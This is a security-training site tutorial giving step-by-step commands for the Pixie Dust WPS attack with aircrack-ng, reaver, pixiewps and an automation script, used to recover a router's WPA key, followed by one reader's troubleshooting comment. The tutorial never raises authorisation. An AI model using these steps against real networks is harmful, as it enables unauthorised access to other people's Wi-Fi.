Hacking WPS via Pixie Dust Attack

April 22, 2016 | Views: 62673

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

This Cybrary 0P3N submission will cover how to use tools such as aircrack suite, Reaver, Pixiewps, & HT-WPS#B to exploit a WPS vulnerability in certain routers.

This attack is carried out on a Machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B).

Here is a list of vulnerable routers:
Spreadsheet of Routers Vulnerable to WPS Exploit

To start, open a terminal as root and run the following commands.

 

apt-get update

apt-get install reaver aircrack-ng

 

Once you have ran the following commands, we will use airmon-ng to set our wireless card into monitor mode. (Must have a wireless card capable of packet injection)

First we will check for any interfering processes by using the following command.

 

airmon-ng check

 

If processes were found, use the following command to kill them.

 

airmon-ng check kill

 

Now to set the card to monitor mode.

 

airmon-ng start wlan0

 

Next we will use airodump-ng to scan for wireless access points with WPS enabled.

 

airodump-ng wlan0mon --wps

 

Once airodump has found the AP you are attacking, press ctrl+C to stop, then copy down the BSSID & Channel #.

Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.

 

reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1

 

-i specifies the interface used

-c specifies the channel of the AP. Replace # with the channel number.

-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.

You can also time the reaver process by using the following command.

 

time reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1

 

If successful, the WPS pin will be passed to reaver and the WPA key will be discovered.

 

Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.

 

Using HT-WPS-Breaker to automate the process.


To install, CLICK HERE then drag the .zip to your desktop and run the following commands.

  • cd Desktop
  • unzip HT-WPS-Breaker-master.zip
  • cd HT-WPS-Breaker-master
  • chmod +x HT-WB.sh
  • ./HT-WB.sh or bash HT-WB.sh

 

This concludes a simple write up of how to use Reaver and other tools to attack a WPS enabled AP.

I have had many questions on how to use Reaver so I hope this helps.

Comment below if you have any questions. (Please keep comments in regards to the topic).

~Evox

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
47 Comments
  1. Hi everybody ! and thanks you for all

    First of all, excuse my English.
    I have an adapter Alpha Network and TP-Link with Atheros AR9271 chip and recurrently I have this error when I test WIFI with WPS enabled and not this LOCK.

    Failed to authenticate (0x02)
    or
    Timeout

    I have tried with 7 different router.
    I use kali Linux 2.0 updated.
    I checked with “wash -i wlan0mon” but still the error persists.
    Any solution to this?

    Thank you team!

Page 6 of 6« First...«23456
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 332 / December 14, 2019
How do I Get MTA Certified?
Views: 924 / December 12, 2019
How much does your PAM software really cost?
Views: 1377 / December 10, 2019
How Do I Get into Android Development?
Views: 1755 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel